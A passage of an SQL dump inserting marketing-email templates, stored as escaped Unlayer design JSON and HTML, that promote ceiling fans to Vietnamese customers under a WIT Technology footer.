title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_35\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 15px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #f5f5f5; line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">Xu h\\u01b0\\u1edbng l\\u00e0m m\\u00e1t ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi ki\\u1ebfn tr\\u00fac kh\\u00f4ng gian n\\u1ed9i th\\u1ea5t nh\\u00e0 \\u1edf Vi\\u1ec7t Nam. S\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n s\\u1ebd gi\\u00fap b\\u1ea1n ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n chi phi ti\\u1ec1n \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng. V\\u00e0o m\\u00f9a h\\u00e8 qu\\u1ea1t tr\\u1ea7n k\\u1ebft h\\u1ee3p v\\u1edbi \\u0111i\\u1ec1u ho\\u00e0 kh\\u00f4ng kh\\u00ed b\\u1ea1n s\\u1ebd t\\u0103ng th\\u00eam 2-5 \\u0111\\u1ed9 C, m\\u1ed7i \\u0111\\u1ed9 C b\\u1ea1n t\\u0103ng t\\u1eeb h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u ho\\u00e0 s\\u1ebd ti\\u1ebft ki\\u1ec7m 5% chi ph\\u00ed \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_36\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 22px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ced4d9; line-height: 170%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 170%;\\\"><span style=\\\"font-size: 12px; line-height: 20.4px;\\\">\\u00a9 Tổ chức đào tạo WIT Technology | All Rights Reserve.\\u00a0<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 170%;\\\"><span style=\\\"font-size: 12px; line-height: 20.4px;\\\"><a rel=\\\"noopener\\\" href=\\\"%unsubscribe_url%\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; line-height: 20.4px; font-size: 12px;\\\">Unsubscribe<\\/span><\\/a>\\u00a0 here<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(8, 'New - Quạt trần Haiku - giải pháp làm mát cho không gian nhà ở của bạn', '', 9, 0, 1, 'vietnamese', '', 18, '2023-04-11 10:44:58', '', 'New - Quạt trần Haiku - giải pháp làm mát cho không gian nhà ở của bạn', 0, '', '', '', '', '', '\"{\\\"counters\\\":{\\\"u_column\\\":6,\\\"u_row\\\":6,\\\"u_content_image\\\":19},\\\"body\\\":{\\\"id\\\":\\\"9H1KbTjgNz\\\",\\\"rows\\\":[{\\\"id\\\":\\\"ovv_SryVev\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"WMfcOEOu_i\\\",\\\"contents\\\":[{\\\"id\\\":\\\"5jx9F4Hbtk\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681265754244-090%20131%2008%2086%20(4).png\\\",\\\"width\\\":1080,\\\"height\\\":1080,\\\"autoWidth\\\":true,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"left\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_19\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"_override\\\":{\\\"mobile\\\":{\\\"src\\\":{\\\"autoWidth\\\":true,\\\"maxWidth\\\":\\\"100%\\\"}}}}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"500px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Arial\\\",\\\"value\\\":\\\"arial,helvetica,sans-serif\\\"},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"center\\\"},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#e7e7e7\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":13}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 520px) {\\r\\n  .u-row {\\r\\n    width: 500px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 500px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 520px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } @media (max-width: 480px) { #u_content_image_19 .v-src-width { width: 100% !important; } #u_content_image_19 .v-src-max-width { max-width: 100% !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #e7e7e7;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #e7e7e7;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #e7e7e7;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 500px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:500px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"500\\\" style=\\\"width: 500px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 500px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_image_19\\\" style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"left\\\">\\r\\n      \\r\\n      <img align=\\\"left\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681265754244-090%20131%2008%2086%20(4).png\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 480px;\\\" width=\\\"480\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(9, 'Quạt trần Tổ chức đào tạo WIT - giải pháp làm mát cho không gian nhà ở của bạn', '', 9, 0, 1, 'vietnamese', '', 18, '2023-04-12 09:25:48', '', 'Quạt trần Tổ chức đào tạo WIT - giải pháp làm mát cho không gian nhà ở của bạn', 10, '', '', '', '', '', '\"{\\\"counters\\\":{\\\"u_row\\\":9,\\\"u_column\\\":14,\\\"u_content_text\\\":9,\\\"u_content_image\\\":17,\\\"u_content_button\\\":5,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":8,\\\"u_content_heading\\\":2,\\\"u_content_text_deprecated\\\":3},\\\"body\\\":{\\\"id\\\":\\\"nY2UpNg7xs\\\",\\\"rows\\\":[{\\\"id\\\":\\\"CvMouKqZza\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"MIyWoeK0P3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"lJaSdkZRut\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 19px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677921547793-log_hq.png\\\",\\\"width\\\":980,\\\"height\\\":130,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/quattranvn.com\\/quat-tran-hamilton-air\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_10\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"_override\\\":{\\\"desktop\\\":{\\\"hideDesktop\\\":false}}}},{\\\"id\\\":\\\"GzHN6DFQWY\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681267039274-quat-tran-3-canh-onix-orb.jpg\\\",\\\"width\\\":1200,\\\"height\\\":1372,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/quattranvn.com\\/quat-tran-3-canh-onix-orb.html\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"_override\\\":{\\\"desktop\\\":{\\\"hideDesktop\\\":false}}}},{\\\"id\\\":\\\"mWDZmdczN4\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"18px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 18px; line-height: 23.8px; color: #000000;\\\\\\\"><strong>Qu\\u1ea1t tr\\u1ea7n HAMILTON AIR - Ki\\u1ec3u d\\u00e1ng th\\u1ee7 c\\u00f4ng - Tho\\u1ea3i m\\u00e1i s\\u00e1ng t\\u1ea1o<\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"jeUIW0ap6n\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#000000\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"130%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_1\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe PHONG C\\u00c1CH CHO T\\u1eeaNG KH\\u00d4NG GIAN S\\u1ed0NG\\\"}},{\\\"id\\\":\\\"BmGSUfsgOl\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_7\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#0c6097\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"RYZiqC9Ge_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_8LBi9___H\\\",\\\"contents\\\":[{\\\"id\\\":\\\"hv9TUnw-D5\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true,\\\"body\\\":false},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 200%;\\\\\\\">Phong C\\u00e1ch - Sang Tr\\u1ecdng l\\u00e0 \\u0111i\\u1ec1u ki\\u1ec7n \\u0111ang \\u0111\\u01b0\\u1ee3c nhi\\u1ec1u \\u0111\\u01a1n v\\u1ecb thi\\u1ebft k\\u1ebf, nh\\u00e0 th\\u1ea7u, ch\\u1ee7 \\u0111\\u1ea7u t\\u01b0 l\\u1ef1a ch\\u1ecdn hi\\u1ec7n nay b\\u1edfi qu\\u1ea1t tr\\u1ea7n cho kh\\u00f4ng gian nh\\u00e0 \\u1edf.<\\/p>\\\\n<p style=\\\\\\\"line-height: 200%;\\\\\\\">Trong quy tr\\u00ecnh s\\u1ea3n xu\\u1ea5t, \\u0111\\u1ec3 \\u0111\\u1ebfn \\u0111\\u01b0\\u1ee3c v\\u1edbi tay ng\\u01b0\\u1eddi ti\\u00eau d\\u00f9ng, nh\\u1eefng lo\\u1ea1i s\\u1ea3n ph\\u1ea9m c\\u1ee7a HAMILTON AIR ph\\u1ea3i tr\\u1ea3i qua ti\\u1ebfn tr\\u00ecnh s\\u1ea3n xu\\u1ea5t v\\u00e0 ki\\u1ec3m duy\\u1ec7t kh\\u1eaft khe. \\u0110i\\u1ec1u n\\u00e0y s\\u1ebd gi\\u00fap h\\u1ea1n ch\\u1ebf nh\\u1eefng r\\u1ee7i ro \\u0111\\u00e1ng ti\\u1ebfc trong quy tr\\u00ecnh s\\u1eed 